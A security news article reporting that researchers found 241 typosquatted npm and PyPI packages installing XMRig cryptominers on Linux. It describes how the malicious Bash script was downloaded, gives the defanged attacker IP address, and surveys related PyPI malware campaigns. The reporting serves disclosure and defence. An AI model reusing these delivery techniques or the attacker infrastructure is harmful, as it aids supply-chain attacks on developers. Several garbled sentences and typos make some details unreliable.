Posted on August 21, 2022 at 11:08 AM

Researchers Discover 241 npm and PyPI Packages Dropping Linux Crytpominers

Security researchers have discovered no less than 241 malicious npm and PyPI packages infect Linux machines before dropping crytpominers.

According to the report, the packages are typosquats of very common open source libraries and commands such as AIOHTTP, argparse, and React. However, they have several capabilities, including downloading and installing cryptomining Bash scripts from the hacker’s server.

PyPI is a repository of more than 350,000 open-source software packages that allow millions of registered users to install it into their Python projects. This helps them to develop complex products with ease.  The malware developers usually take advantage of the open-source nature of the malware to upload fake or malicious packages to breach the developers’ systems.

33 Projects Launched Cryptominer XMRig

Researcher and software developer Hauke Lubbers stated that about 33 projects on PyPI have all launched open-source Monero cryptominer XMRig after infecting a device. As the researcher was about to report his discovery of the 33 malicious projects to the PyPI admin, he discovered that the hackers started publishing another set of 22 packages with the same type of malicious payload.

“After I reported them to PyPI, they were quickly deleted,” Lubber said. However, he added that the malicious actor was still trying to upload more packages and upload 22 more of them.

The threat actors used the packages to target Linux systems, installing crypto mining software XMRig in the process.

The Python packages are built with codes that can download the Bash script from the hacker’s server through Bit.ly URL shortener. The security researcher explained that the redirect was achieved by downloading and exchanging the Bash script from http://80.78.25[.]140:8000/.cmc”.

Once executed, the script informs the hacker about the IP address of the breached host and whether the deployment of the cryptominer was successful.

The IP Address Has Been Taken Down

According to BleepingComputer, who communicated directly with the researcher, the IP address was taken down at the time of the report. But the researcher’s claims were confirmed from the copy of the scripts sent by the researcher.

Lubbers said he discovered the packages through his little side project called Package Observatory Club. It was used to query and store metadata on different packages uploaded to RubyGems.org and PyPI. It also runs some heuristics. Once the package starts acting suspicious, the project alerts the researcher to look into the activities closer.

The developer refers to heuristics as the names of packages that seem similar to those of popular packages and standard libraries that indicate the presence of potential typosquats. It is very common to receive a false positive, but last week the number of typosquatting on PyPI was unprecedented.

The researcher noted that he decided to carry out the research and made this discovery because the infosec community gains a lot from the open-source software ecosystem. As a result, he decided to give something back. He added that he will continue to contribute directly by reporting flaws and helping to protect servers from malicious actors. However, it should be noted that several works on the package repositories side are carried out by very few volunteers.

Lubbers noted that the Sonatype security research team he is part of uncovered another 186 npm typosquatting packages that contacts the same type of URL to download the malicious Bash script. The security team has continued to work together to discover more packages that could be used to explore vulnerable servers.

More Threat Actors Target Servers To Steal Cryptocurrencies

It seems that the registered dispatched the typosquats immediately from their platforms before they could harm the developers.

There have been several security updates and enhancements over the past few years. New features like Python’s setup tools and the use of two-factor authentication for critical projects have been introduced to prevent hackers from gaining into servers. However, the war against threat actors is even getting more challenging every day.

Last week, software security firm Checkmarx said it discovered a handful of malicious Python packages that are used to carry out DDoS attacks on Counter-Strike servers.

Earlier this month cybersecurity firm CheckPoint uncovered 10 malicious PyPI packages caught stealing credentials of developers.

The packages were used to infect developers’ systems with password-stealing malware. The fake packages utilized typosquatting to impersonate popular software projects and deceive  PyPI users to download them.

In the same month, another cybersecurity firm ReversingLabs exposed a supply chain attack called IconBurst, which exploited typosquatting to infect developers.